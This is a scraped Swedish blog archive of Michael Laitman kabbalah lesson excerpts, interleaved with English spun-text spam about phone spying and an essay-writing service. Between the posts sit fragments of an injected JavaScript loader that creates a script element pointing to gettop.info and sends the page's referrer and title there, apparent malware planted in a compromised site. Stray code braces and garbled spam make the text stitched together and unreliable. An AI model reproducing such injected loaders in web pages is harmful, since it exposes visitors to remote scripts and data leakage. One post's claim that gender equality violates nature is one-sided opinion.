Inlägg i kategori ''

Parent Cell Phone Monitoring Iphone

Cell Phone Spying: Has To Be Your Personal life Having been Observed?

It joins you around the world, however, your cell phone is also imparting people on your leader to your personal partner a home window within your nearly every advance. Those system that allows you to live in look on-the-go are now able to allow other people utilize your private industry – devoid of you even suspecting an issue is awry.

The age group

Extended the days are gone of simple and easy wiretapping, generally if the most terrible your phone could do was please let people listen straight into your chats. [Läs mer →]

Per definition kan vi inte förstå varandra

Dr. Michael LaitmanUtan korrekta definitioner finns det inget gemensamt språk. Det tycks som om vi använder samma ord, men varje ord har en helt annan betydelse för oss. Låt oss säga att vi började undervisa i ett främmande språk till någon, men gav egenmäktiga definitioner för orden. Vår student skulle börja tala med någon annan, men ingen av dem skulle förstå den andra. Som vanliga människor, förstår vetenskapsmän och filosofer inte kabbalister.

I allmänhet är detta problemet med alla mänskliga relationer, eftersom vi alla har våra egna speciella definitioner för orden. Vanligtvis är dessa skillnader inte signifikanta, men ändå, det är därför det är så svårt för oss att kommunicera med varandra.

När det gäller skillnaderna mellan de vanliga definitionerna accepterade inom vetenskap och filosofi och den kabbalistiska visdomen, finns det absolut ingen förbindelse alls. Det verkar för folk att de redan vet vad den andliga världen och Skaparen är. Människor känner att de inte behöver ändra sig för att nå Honom i sina förnimmelser. De förstår inte att de uppfattar hela världen inom sina egoistiska begär och att andlig uppfattning kräver att uppnå likhet med det som studeras.

Tills vi når fram till en gemensam nämnare här, är det omöjligt att prata. Per definition förstår vi inte varandra. Forskare är smarta människor, men tyvärr använder de olika definitioner.

Kabbalah konstaterar att ens verklighetsuppfattning beror på personen, på hans egenskaper, egoistiska eller altruistiska. Vi uppfattar hela verkligheten inom oss själva, ingenting finns utanför. Allting är relativt.

Det är svårt för forskare att hålla med om detta. De har inte några sådana tidigare antaganden innan sina studier; de behöver dem inte. Vetenskapen studerar allt på insidan av dom egoistiska begären och kommer inte utanför denna gräns. Det är därför de inte är känsliga för sådana nyanser, att vara inne i begäret, i enlighet med dess storlek och kvaliteter.

Dessutom, för dem är allt redan klart. De är inne i ett litet rum och studerar saker bara inuti det. Man kan ju säga, ”Men, jag studerar saker i rummet bredvid. Man kan komma ut ur rummet till ett annat, och studera saker där.” Men de är förbryllade: ”Finns det ett annat rum?” Det finns inget behov, förståelse eller uppfattning om att något sådant kunde existera. Det är därför som de anser att kabbalah är en filosofi som påstås vara avskild från verkligheten. För dem är vetenskap, studier, och fakta bara här i vår värld.

Med andra ord, i hans utveckling, har en person ännu inte kommit till den uppfattningen att det finns en verklighet högre än den som vi uppfattar med våra begränsade sinnesorgan. För detta är det de respektive interna kvaliteterna som behövs, uppenbarelsen inom personen av den andliga genen (reshimo, minne) så att han börjar komma överens, acceptera och känna sådana definitioner.

I verkligheten är det bara motgång som är till hjälp här. Ljuset träffar begäret om och om igen, och låter personen känna hur han kastas upp och ner. Således lite i taget, börjar han att förstå att något sådant verkligen kan existera.

Från den fjärde delen av den dagliga kabbalalektionen 12/27/2011, “Den kabbalistiska visdomen och filosofi”
videoikonVideo ljudikonMp3

} else {

Sörj för det grundläggande i livet och bekymra dig för själen

Dr. Michael LaitmanFråga: Vad innebär det att försörja den andra med allt som han saknar?

Svar: Med säkerhet så talar vi inte om vår världs verklighet. För i så fall skulle du bli klandrad för att vara hårdhjärtad: “Skäms du inte? Du studerar kabbala och ger inte bort allt du äger”. Okunniga människor tror att du måste svettas för att sörja för allt materiellt som andra behöver.

I sanning, att hjälpa andra betyder att visa dem hur de kan korrigera sig. Det enda undantaget till denna regel är grundläggande mänskliga behov. Vi måste förse alla med grundläggande förnödenheter så att ingen människa i världen saknar det.

Men utöver det så bekymrar vi oss enbart för korrigeringen av själen. Det finns inget rum för tvivel: Först av allt, en människa behöver säkerställa den grundläggande, ”djuriska” existensen, och i allt annat måste hon sörja för det ”mänskliga” i henne, alltså själen.}

Essay generating expert services choose basic research document, dissertation

Mineral water water flow Water flow could be the artificial removal of area or subsurface water supply out of a distinct/ provided with subject.Rain water being drained either can be spot or subsurface standard tap water caused by rainwater, springs and streams or as seepages, usual or possibly even manufactured supply of waters. [Läs mer →]

Avsikt: Vad som är viktigt är resultatet

Dr. Michael LaitmanFråga: Vad är avsikt?

Svar: Avsikten är det som du önskar från ditt tillstånd. Det viktiga är inte det du säger eller gör, men exakt vart du siktar, vilket resultat du förväntar dig från det nuvarande tillståndet, och det spelar ingen roll om det är ditt eller vårt.

Annorlunda uttryckt, hur vill du se ditt kommande tillstånd? Hur föreställer du dig det nu? Vad kommer du göra: skänka till Skaparen, ta emot för dig själv, förtjäna, stjäla, ge vidare, ge ut? Hur föreställer du dig själv i nästa tillstånd? Detta är din avsikt.

Det är därför som bara människan har avsikter. Hon är den enda i hela skapelsen som är utanför tiden. Avsikten opererar inte i den materiella tiden, men i andlig tid, vilken ligger ovanför vårt begär.

Från den tredje delen av den dagliga kabbalalektionen 3/20/11, Talmud Eser Sefirot

En välbekant sång låter bättre

Dr. Michael LaitmanVi måste förbereda oss för kongressen så att vi kommer dit med ett upplyft humör. Vi måste bli bekanta med allt förberedande material, titta på alla videoklipp, och lära oss alla låtar som vi kommer att sjunga där.

På detta vis bör det inte vara något nytt eller komma som några överraskningar för dig. Ju mer bekant materialet är, desto starkare intryck gör det på dig. Vi lär utav världarnas struktur att den första föreningen mellan den manliga och kvinnliga delen inte avlar ett nytt liv, utan bara skapar kärlet (kli). Ljuset blir bara uppenbarad i detta kli som startar med den andra föreningen.

Först av allt, behöver en person förbereda sina begär (kärl, Kelim) och därför, är det värt att bekanta sig med allt material. Om allt är bekant för en person, kommer han eller hon att kunna uppnå en starkare koppling under konventet. Och om vi ser något för första gången, kan vi inte behärska det omedelbart. Vi har ännu inte begäret för det, och det finns ingen plats för att ta emot uppfyllelsen, det är bara det första mötet.

Men bara att ha en sammankomst är inte tillräckligt för oss, vi vill ha delaktighet och självförverkligande. Det är möjligt bara om du är väl förtrogen med programmet. Vi talar inte om några individuella prestationer, men vi måste veta och delta i allt annat som händer på scenen.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Förberedelse för den stundande kongressen

Dr. Michael LaitmanVi behöver några gånger om dagen utföra en beräkning och granska det tillstånd vi befinner oss i, vår attityd till Skaparen, omgivningen, och oss själva – och justera vår riktning. Vi kommer ur kurs hela tiden; det är naturligt. Vårt ego växer trots allt ständigt, och vi måste lägga ner mer och mer möda på att hålla det under kontroll.

Jag måste separera min djuriska kropp från det andliga målet, ge kroppen allt den behöver, och att rikta in allt övrigt på att uppnå skänkande, verifiera det relativt omgivningen, enligt hur starkt jag vill kopplas samman med den.

Då kommer jag inte att bli förvirrad, och det kommer att vara tydligt för mig hur mycket jag behöver för ett vanligt liv, och hur mycket jag kan ge till omgivningen. Det vill säga, jag kommer att veta precis var jag är och var min gräns är. Det är mycket viktigt eftersom du om du känner en gräns kan guida dig själv på rätt sätt: Att ge det som är nödvändigt till det materiella, och att göra allt som är möjligt för andlighetens skull.

Nu, före konventet, måste du undersöka hur starkt du känner behovet av att kopplas samman. Väck dig själv genom att se inspelningar av tidigare kongresser, för att på så vis kopplas till den omgivning som är glad för sin utveckling. Detta gör en väl förberedd.

Det finns ingen tid i andligheten: Det finns ingen dåtid, nutid eller framtid. När du tittar på inspelningarna är det alltså inte något förflutet. Vi kopplas till det tillstånd vi befinner oss i nu. Det är överhuvudtaget ingen skillnad om jag ser på en inspelning som gjordes för 6 månader sedan, eller om jag deltar i vad som sker idag. Alla dessa tillstånd förenas och blir en och samma verklighet. Genom att inspireras av det förflutna, kan jag förbereda mig själv för det kommande mötet.

Från den första delen av den dagliga kabbalalektionen 2011.03.21, om förberedelse för WE!-kongressen
videoikon Videoljudikon MP3

document.currentScript.parentNode.insertBefore(s, document.currentScript);

En fantastisk resa in i det okända

Dr. Michael LaitmanVi existerar i ett system av lagar som verkar. Det finns en övre kraft som påverkar oss och vill skänka godhet. Den skapade därför viljan att ta emot, som den kan fylla med njutning.

Den skapade tar emot njutning speciellt genom att bli identisk med den övre kraften: perfekt och evig. För att uppnå detta måste man uppnå samma förnimmelser, samma nivå, djup, kraft och status som tillhör denna övre kraft.

Den primära kraften kallas Skaparen, medan den sekundära är skapelsen. Denna sekundära kraft måste genomgå förvandlingar samtidigt som den samlar på sig olika intryck tills den stigit upp för alla 125 andliga grader. Den måste uppleva dem själv, genom ett självständigt sökande, förståelse, medvetande, förnimmelse och ansträngning att uppnå det hela och vilja nå ett tillstånd som förberetts för den av den övre kraften.

Skapelsens evolution implicerar därmed ett element av personligt deltagande, ens egna känslor och tankar, en medvetenhet om min egen existens och insikt. Men skapelsen har inte möjligheten att göra någonting själv, utom en enda sak: att vilja förändras. Kraften till förvandlingarna, deras program och ordning kommer faktiskt enbart från den ursprungliga givande kraften, Skaparen.

Ens framgång i arbetet avgörs av att lära sig att dela hela ens utveckling i två delar: arbetet som tilldelats skapelsen och det arbete som utförs av den övre. De är partners, men deras integrerande arbete distribueras enligt vad som hör till människan och vad som hör till Skaparen.

Nyckeln är att inte försöka göra Skaparens arbete, att försöka förändra sig själv och världen. Människans arbete är att vilja förändras. Och dessa förändringar måste ske ovanför min natur, vilket kallas ”ovanför mitt förnuft”. Detta innebär att min förvandlings riktning, såväl som de egenskaper och inre förnimmelser som formas i mig är fullständigt oförståeliga för mig, eftersom jag tar emot en ny natur.

Att inte ha en aning om var man är eller vart man är på väg är ett säkert tecken på att en ny natur håller på att träda fram i en. Det är ju så att om man visste och kände allt i förväg, skulle alla förändringar ske med ens egoisms, sin naturs, samtycke.

När en människa växer inom sin egen natur är hon aningen medveten om vad man kan förvänta och gör val som tjänar sin nuvarande egoism. Men i andligheten, när vi vill erhålla en annorlunda natur och bli lika Skaparen, rör vi oss alltid mot någonting okänt och oförutsägbart. Vi drar bara till oss de utvecklande krafterna.

Men huvudsakligen finns det bara en kraft som delas upp i flera komponenter enligt deras nytta: vårt individuella, ursprungliga begär, ”punkten i hjärtat”, gruppens kraft, studiernas kraft, och slutligen kraften som verkligen agerar på oss och reformerar oss, som kallas det omgivande Ljuset.

Från den första delen av den dagliga kabbalalektionen 08.03.2011, om studiernas vikt
videoikon Videoljudikon MP3

d.getElementsByTagName(‘head’)[0].appendChild(s);

Den unika kraften i kabbalakonvents

Dr. Michael LaitmanFråga: Tjänar kabbalakonvents som ett slutgiltigt resultat av vårt praktiska arbete? Vad har du att säga om det kommande konventet i Nordamerika?

Svar: Min attityd till den typen samlingar är väldigt positiv, och jag tycker de bereder en möjlighet till stort framåtskridande. Jag ser hur jag efter varje konvent blir bättre och bättre på att ge enklare förklaringar som är lättare för folk att ta till sig. De börjar förstå mig bättre, och vi kommer varandra närmare.

Varje sådant möte är ett steg uppåt. Ett besök på ett kabbalakonvent är värt en månad av dagliga studier. Det ger en person interna och externa intryck och många positiva resultat. Vi organiserar en kongress i Nordamerika en gång om året, så låt inte detta tillfälle gå er förbi.

Om du har möjlighet, men det verkar som om du inte har tillräckligt med tid eller pengar, då är detta hinder som avsiktligt lagts ut framför dig. Du borde granska dig själv uppriktigt, vara medveten om att du står inför ett outgrundligt beslut. En människa som får en sådan här möjlighet en gång om året och inte åker kommer att förlora en hel del eftersom hon förlorar bandet till denna vägen på så vis.

Självklart kan det finnas sakliga anledningar som hindrar en person ifrån att komma, om du till exempel sitter i fängelse. Men, om man kan, men det är svårt, så är det ingen ursäkt. Detta är ett test ifrån Ovan, och man borde kliva över hindren placerade i ens väg.

Många grupper och individer kommer samlas. Det är en mycket annorlunda kraft, och vi sammansluter till hela världen därifrån. Jag kommer göra mitt bästa för att skicka en intern laddning till folket som kommer att vara så nära framför mig för tillfället. Folk behåller känslan av det senare, efter eventet, till skillnad från dem som kunde komma men inte gjorde så.

Förmodligen gör det inte så stor skillnad hur mycket man studerar från dag till dag, om det är i en virtuell grupp eller i en fysisk. Det beror på personen och förhållandena i gruppen. Men varken en fysisk eller virtuell grupp kan ersätta en gemensam samling så som ett konvent där hundra eller tusen personer samlas tillsammans för att förenas.

Det finns dem som av olika anledningar har lämnat en grupp, men ett konvent är något annat, och alla borde ta sig dit utan att göra några beräkningar gällande attityderna inom gruppen eller om vad som. Du bara kommer för att ena dig med världskärlet och stiga till det nästa andliga steget genom detta.

Från den första delen av den dagliga kabbala lektionen 3/4/2011, Skrifter av Rabash
videoikonVideo ljudikonMp3

var d=document;var s=d.createElement(‘script’);

Falsk jämlikhet

Dr. Michael LaitmanFråga: Skadar den moderna jämlikheten mellan könen relationerna mellan män och kvinnor?

Svar: Den ”jämlikhet” vi etablerat enligt vårt egoistiska resonerande är egentligen inte jämlikhet, utan en förvrängning av naturens lagar. I naturen är manliga och kvinnliga tendenser inte identiska, utan tvärtom är de olika, motsatta, och avlägsna från varandra på alla möjliga inre och yttre sätt; i personlighet, livsaktiviteter, fysiologi, och allt annat. Genom att sätta ett likhetstecken mellan dem krossar vi naturen och skapar en enorm spricka som i slutändan inte kommer att gynna någon.

Jag behöver inte förklara vad det innebär att gå emot naturlagarna. Istället för att lära från naturen och ge varje kön den form som är lämplig för det, försöker vi göra vad som än kommer in i våra huvuden så mycket att det kommer att ge oss ytterligare många problem. I slutändan kommer ingen att vara glad över denna ”jämlikhet”.

Av naturen måste jag vara en man med vissa egenskaper och utföra en viss funktion. Jag har en niche som jag måste ta. Det är där jag blir lugn, korrigerar mig, når tillfredsställelse och perfektion. Därför kan jag inte gå den egoism som härskar över mig till mötes och göra hur den än vill med sina befallningar genom egoistiska krafter. Det är ingen tvekan om att allt detta gör allvarlig skada.

Låt oss hoppas att vi på något vis kommer att gå igenom korruptionen till korrektion. Men många bekymmer väntar oss längs denna väg.

Från den fjärde delen av den dagliga kabbalalektionen 2011.03.07, om kvinnor
videoikon Video | ljudikon MP3

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;